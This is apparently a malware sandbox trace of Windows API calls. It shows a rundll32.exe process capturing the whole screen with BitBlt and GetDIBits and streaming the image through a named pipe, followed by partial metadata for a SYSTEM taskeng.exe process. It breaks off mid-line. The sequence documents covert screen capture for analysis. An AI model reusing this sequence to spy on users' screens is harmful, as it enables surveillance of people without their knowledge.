[0499.639] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0499.639] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā", cchSrc=256, lpDestStr=0x18ede8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0499.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18f5c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9fPm\x81ø÷\x18", lpUsedDefaultChar=0x0) returned 256
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0499.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f6c0, cbMultiByte=256, lpWideCharStr=0x18f018, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā") returned 256
[0499.639] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0499.639] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4Ā", cchSrc=256, lpDestStr=0x18ee08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256
[0499.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18f4c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9fPm\x81ø÷\x18", lpUsedDefaultChar=0x0) returned 256
[0499.639] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x358bc8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.639] SetLastError (dwErrCode=0x0)
[0499.639] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.640] GetLastError () returned 0x0
[0499.640] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.641] GetLastError () returned 0x0
[0499.641] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.642] GetLastError () returned 0x0
[0499.642] SetLastError (dwErrCode=0x0)
[0499.643] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76bc0000
[0499.643] GetProcAddress (hModule=0x76bc0000, lpProcName="IsProcessorFeaturePresent") returned 0x76bd9680
[0499.643] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0
[0499.645] GetTickCount () returned 0x8cb19
[0499.645] CreateNamedPipeA (lpName="\\\\.\\pipe\\29a7ba79f8" (normalized: "\\device\\namedpipe\\29a7ba79f8"), dwOpenMode=0x3, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x100000, nInBufferSize=0x100000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x0) returned 0x20
[0499.645] ConnectNamedPipe (in: hNamedPipe=0x20, lpOverlapped=0x0 | out: lpOverlapped=0x0) returned 1
[0500.086] GetLastInputInfo (in: plii=0x18f860 | out: plii=0x18f860) returned 1
[0500.086] GetVersionExA (in: lpVersionInformation=0x18f794*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f794*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0500.086] GetProcessWindowStation () returned 0x8c
[0500.086] GetProcessWindowStation () returned 0x8c
[0500.086] SetProcessWindowStation (hWinSta=0x8c) returned 1
[0500.086] OpenInputDesktop (dwFlags=0x0, fInherit=0, dwDesiredAccess=0x2000000) returned 0x1d0
[0500.086] GetCurrentThreadId () returned 0x60c
[0500.086] GetThreadDesktop (dwThreadId=0x60c) returned 0x90
[0500.087] SetThreadDesktop (hDesktop=0x1d0) returned 1
[0500.087] GetDesktopWindow () returned 0x10010
[0500.088] GetDC (hWnd=0x10010) returned 0x401017e
[0500.088] CreateCompatibleDC (hdc=0x401017e) returned 0xab01079f
[0500.088] GetSystemMetrics (nIndex=78) returned 1440
[0500.092] GetSystemMetrics (nIndex=79) returned 900
[0500.092] GetSystemMetrics (nIndex=76) returned 0
[0500.092] GetSystemMetrics (nIndex=77) returned 0
[0500.092] CreateCompatibleBitmap (hdc=0x401017e, cx=1440, cy=900) returned 0x650507bc
[0500.114] SelectObject (hdc=0xab01079f, h=0x650507bc) returned 0x185000f
[0500.114] BitBlt (hdc=0xab01079f, x=0, y=0, cx=1440, cy=900, hdcSrc=0x401017e, x1=0, y1=0, rop=0xcc0020) returned 1
[0500.250] GetObjectA (in: h=0x650507bc, c=24, pv=0x18f4d4 | out: pv=0x18f4d4) returned 24
[0500.251] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x36fe38
[0500.257] GetDIBits (in: hdc=0xab01079f, hbm=0x650507bc, start=0x0, cLines=0x384, lpvBits=0x6458020, lpbmi=0x36fe38, usage=0x0 | out: lpvBits=0x6458020, lpbmi=0x36fe38) returned 900
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.351] GetLastError () returned 0x0
[0500.351] SetLastError (dwErrCode=0x0)
[0500.462] ReleaseDC (hWnd=0x10010, hDC=0x401017e) returned 1
[0500.462] DeleteDC (hdc=0xab01079f) returned 1
[0500.462] DeleteObject (ho=0x650507bc) returned 1
[0500.463] SetProcessWindowStation (hWinSta=0x8c) returned 1
[0500.463] SetThreadDesktop (hDesktop=0x90) returned 1
[0500.463] CloseWindowStation (hWinSta=0x8c) returned 0
[0500.463] CloseDesktop (hDesktop=0x1d0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x18f83c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x18f83c*, lpNumberOfBytesWritten=0x18f82c*=0x4, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d3c020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d3c020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d3e020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d3e020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d40020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d40020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d42020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d42020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d44020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d44020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.463] WriteFile (in: hFile=0x20, lpBuffer=0x5d46020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d46020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d48020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d48020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d4a020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d4a020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d4c020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d4c020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d4e020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d4e020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d50020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d50020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d52020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d52020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d54020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d54020*, lpNumberOfBytesWritten=0x18f82c*=0x2000, lpOverlapped=0x0) returned 1
[0500.464] WriteFile (in: hFile=0x20, lpBuffer=0x5d56020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x5d56020*, lpNumberOfBytesWritten=0x18f82c*=0x15d0, lpOverlapped=0x0) returned 1
[0500.464] FlushFileBuffers (hFile=0x20) returned 1
[0500.604] GetTickCount () returned 0x8cee2
[0500.604] Sleep (dwMilliseconds=0x1388)
[0505.612] GetTickCount () returned 0x8e279
[0505.612] Sleep (dwMilliseconds=0x3e8)
[0506.628] DisconnectNamedPipe (hNamedPipe=0x20) returned 1
[0506.628] CloseHandle (hObject=0x20) returned 1
[0506.630] ExitProcess (uExitCode=0x0)
Thread:
id = 215
os_tid = 0xf44
Process:
id = "14"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x2086a000"
os_pid = "0xae8"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "taskeng.exe {FB64BD8A-6DCB-4A8C-A074-F1B1D7814CAA} S-1-5-18:NT AUTHORITY\\System:Service:"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT 